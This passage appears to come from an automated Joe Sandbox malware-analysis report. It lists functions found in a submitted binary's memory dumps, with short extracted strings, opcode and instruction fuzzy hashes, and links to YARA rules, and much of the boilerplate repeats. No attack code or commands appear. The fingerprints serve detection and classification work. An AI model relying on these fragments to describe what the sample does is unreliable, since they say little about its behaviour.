                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: :$NA_I$m1s3$uvw
                                                                                                                    • API String ID: 0-3973114637
                                                                                                                    • Opcode ID: 539a370f273c1ef9e203852c76ffef1e43dfe801a23b3f4e94df1ce246db150b
                                                                                                                    • Instruction ID: 761c2e240eb2c7753e5fa81bafb79a44add6ad21529f255277959c4c089390ab
                                                                                                                    • Opcode Fuzzy Hash: 539a370f273c1ef9e203852c76ffef1e43dfe801a23b3f4e94df1ce246db150b
                                                                                                                    • Instruction Fuzzy Hash: 9432BCB4508381DFD315DF28E880A2ABBE1FB9A344F144A2CF5D58B262D335D9A5CF52
                                                                                                                    Function 00103BE2 Relevance: 5.4, Strings: 4, Instructions: 431COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: %*+($;z$p$ss
                                                                                                                    • API String ID: 0-2391135358
                                                                                                                    • Opcode ID: a04b3455179e311085f3f8a2aa0bbd18c256d98dc3f983718e5bb0a1434ed346
                                                                                                                    • Instruction ID: c886c821c01006e664a34af23d19bb474bf98cb9df11b56b69a6bc2bcf2b6042
                                                                                                                    • Opcode Fuzzy Hash: a04b3455179e311085f3f8a2aa0bbd18c256d98dc3f983718e5bb0a1434ed346
                                                                                                                    • Instruction Fuzzy Hash: A1027CB4810B00DFD760DF24D986756BFF5FB02701F50495DE8EA8B696E370A419CBA2
                                                                                                                    Function 00112260 Relevance: 5.4, Strings: 4, Instructions: 383COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: a|$hu$lc$sj
                                                                                                                    • API String ID: 0-3748788050
                                                                                                                    • Opcode ID: f3c4809bd156ab57ef750fa67d6e50a209f6efc1d7bae3a1a22b89d76476c585
                                                                                                                    • Instruction ID: e85227ebd88ce5842ca7f5d2d35372abbd0f373063b6ec6c109f454f94f4df4b
                                                                                                                    • Opcode Fuzzy Hash: f3c4809bd156ab57ef750fa67d6e50a209f6efc1d7bae3a1a22b89d76476c585
                                                                                                                    • Instruction Fuzzy Hash: D7A1ADB44083408BC724DF18C891AABF7F0FF96754F148A1CE8D59B291E339D991CB96
                                                                                                                    Function 0011D7AF Relevance: 5.2, Strings: 4, Instructions: 213COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: #'$CV$KV$T>
                                                                                                                    • API String ID: 0-95592268
                                                                                                                    • Opcode ID: a5c97745473cc851856ecb97609f86b50c2c70b35947efba2d1885a613055c82
                                                                                                                    • Instruction ID: c638ab48c837aea107ccab1cc81342c1e9e85a85d8ef9f73263b1edb52d2f894
                                                                                                                    • Opcode Fuzzy Hash: a5c97745473cc851856ecb97609f86b50c2c70b35947efba2d1885a613055c82
                                                                                                                    • Instruction Fuzzy Hash: 788157B48017459BCB20DF95D2851AEBFB1FF16300F60461CE4866BA55C330AA65CFE2
                                                                                                                    Function 0011AC91 Relevance: 5.1, Strings: 4, Instructions: 128COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: (g6e$,{*y$4c2a$lk
                                                                                                                    • API String ID: 0-1327526056
                                                                                                                    • Opcode ID: 2f4c7815aa4c233f8f27bea7384df2ee9d4dfc3c237f6aaac79f379a242562ab
                                                                                                                    • Instruction ID: 4fe4ab2cc9b4a84fda8db31da65df2c789113f1b916668b653d84f3ef0b26dd5
                                                                                                                    • Opcode Fuzzy Hash: 2f4c7815aa4c233f8f27bea7384df2ee9d4dfc3c237f6aaac79f379a242562ab
                                                                                                                    • Instruction Fuzzy Hash: E24185B4409381DBD7209F20D900BABBBF0FF86305F54996DE5C897260EB35D984CB96
                                                                                                                    Function 0011C470 Relevance: 4.2, Strings: 3, Instructions: 419COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: %*+($%*+($~/i!
                                                                                                                    • API String ID: 0-4033100838
                                                                                                                    • Opcode ID: 0a52b65d21aac136fbc1b45088e8e805fe314d7344cfe8aeacd50a7dbf62906b
                                                                                                                    • Instruction ID: ad86684b2163e40e091dbd9456bbd5025787fd12d7895d9e94d23ff08023134f
                                                                                                                    • Opcode Fuzzy Hash: 0a52b65d21aac136fbc1b45088e8e805fe314d7344cfe8aeacd50a7dbf62906b
                                                                                                                    • Instruction Fuzzy Hash: 6AE1A8B5518344EFE324DF64D881B6BBBF6FB96344F44882CE58887261D771D890CB92
                                                                                                                    Function 000F8590 Relevance: 4.1, Strings: 3, Instructions: 387COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: )$)$IEND
                                                                                                                    • API String ID: 0-588110143
                                                                                                                    • Opcode ID: 6bb28ae87ae4105b8431ba086c30ec4a73170671bf94e1e87f63a9d4d3f30128
                                                                                                                    • Instruction ID: 8ccadbe1f818381f9a7444487b495e10654617affb0da8ae874e7b073352aa38
                                                                                                                    • Opcode Fuzzy Hash: 6bb28ae87ae4105b8431ba086c30ec4a73170671bf94e1e87f63a9d4d3f30128
                                                                                                                    • Instruction Fuzzy Hash: EAE1D571A0870A9FE310CF24C8817AABBE0FB94314F14892DE69597782DB75E915DBC3
                                                                                                                    Function 002C7D31 Relevance: 4.1, Strings: 2, Instructions: 1601COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: l4}T$_d
                                                                                                                    • API String ID: 0-1502817504
                                                                                                                    • Opcode ID: 13a3a2fce5ccffe306f980f4a447aa92a6beb706be836774f113968d3dea1bbd
                                                                                                                    • Instruction ID: b5ff90f3a02976acb93f115c6bd56c236499166454213a8330d24cc16280fec6
                                                                                                                    • Opcode Fuzzy Hash: 13a3a2fce5ccffe306f980f4a447aa92a6beb706be836774f113968d3dea1bbd
                                                                                                                    • Instruction Fuzzy Hash: FAB2E5F3A08204AFE3146E29EC8567AFBE9EF94720F1A493DE6C4C3740E67558058697
                                                                                                                    Function 00134040 Relevance: 3.1, Strings: 2, Instructions: 577COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: %*+($f
                                                                                                                    • API String ID: 0-2038831151
                                                                                                                    • Opcode ID: 9a944f7d9413ca4e252aaa83d78fc95f85303dc25145433e18ce327622fd671b
                                                                                                                    • Instruction ID: d936764857ba0c9161b3d07ba84827a51fca1445de85909d569e172d952a1364
                                                                                                                    • Opcode Fuzzy Hash: 9a944f7d9413ca4e252aaa83d78fc95f85303dc25145433e18ce327622fd671b
                                                                                                                    • Instruction Fuzzy Hash: 9412A8716083419FC714CF18C890B2EBBE6FB89314F588A2CF9959B3A1D735E945CB92
                                                                                                                    Function 0012F620 Relevance: 3.0, Strings: 2, Instructions: 461COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: dg$hi
                                                                                                                    • API String ID: 0-2859417413
                                                                                                                    • Opcode ID: fd0cb8ad6b394815e33f3569e3b145f3912037fcd0eac2d301aba1500bcc0b19
                                                                                                                    • Instruction ID: 42212a2fb8d9768b2db239043d38c6dfc18300ad2cf1dac0190462636647f24f
                                                                                                                    • Opcode Fuzzy Hash: fd0cb8ad6b394815e33f3569e3b145f3912037fcd0eac2d301aba1500bcc0b19
                                                                                                                    • Instruction Fuzzy Hash: FEF18575618341EFE704CF24D891B2ABBF6FB86348F94892CF5858B2A1D735D885CB12
                                                                                                                    Function 000F35B0 Relevance: 2.9, Strings: 2, Instructions: 411COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Inf$NaN
                                                                                                                    • API String ID: 0-3500518849
                                                                                                                    • Opcode ID: 59109922a4bafca66d24445d5b3e111f28ed7e6deda9d30986fa38f547f41241
                                                                                                                    • Instruction ID: bfc2151c62c2c53301dd31524ef9a16c09be68b0340719e62c73cefa267b5339
                                                                                                                    • Opcode Fuzzy Hash: 59109922a4bafca66d24445d5b3e111f28ed7e6deda9d30986fa38f547f41241
                                                                                                                    • Instruction Fuzzy Hash: 72D1F671A083159BC714CF29C88062FB7E1EFC8760F148A2DFA99977A0E775DD059B82
                                                                                                                    Function 0010FFDF Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: BaBc$Ye[g
                                                                                                                    • API String ID: 0-286865133
                                                                                                                    • Opcode ID: 26bf61967567985744c9267b73891a907d80b1c1999ebc63c1a82f671ad44e53
                                                                                                                    • Instruction ID: 1f15f1846e7d28c474bed678d30d3d660ce04679cc53987129038ce91812ed3e
                                                                                                                    • Opcode Fuzzy Hash: 26bf61967567985744c9267b73891a907d80b1c1999ebc63c1a82f671ad44e53
                                                                                                                    • Instruction Fuzzy Hash: 7B519CB1A083818AD336CF14C481BEBB7E0FF9A350F19492DE4998B651E3B499C0CB57
                                                                                                                    Function 000F5160 Relevance: 1.8, Strings: 1, Instructions: 577COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: %1.17g
                                                                                                                    • API String ID: 0-1551345525
                                                                                                                    • Opcode ID: dad817a9aa2802cdd1793fb69cd52628383ff08290c9f1ed6911592aa1c9ec98
                                                                                                                    • Instruction ID: 239edce0a5b30ac14ed69a96983ed0b5b0e7ab232c5a2c566fd65485995cd336
                                                                                                                    • Opcode Fuzzy Hash: dad817a9aa2802cdd1793fb69cd52628383ff08290c9f1ed6911592aa1c9ec98
                                                                                                                    • Instruction Fuzzy Hash: 1922F6B2608B4A8BE7258E18DC4033ABBE2AFE1306F1D856DDB594BB41E771DC05E741
                                                                                                                    Function 001212D0 Relevance: 1.7, Strings: 1, Instructions: 484COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
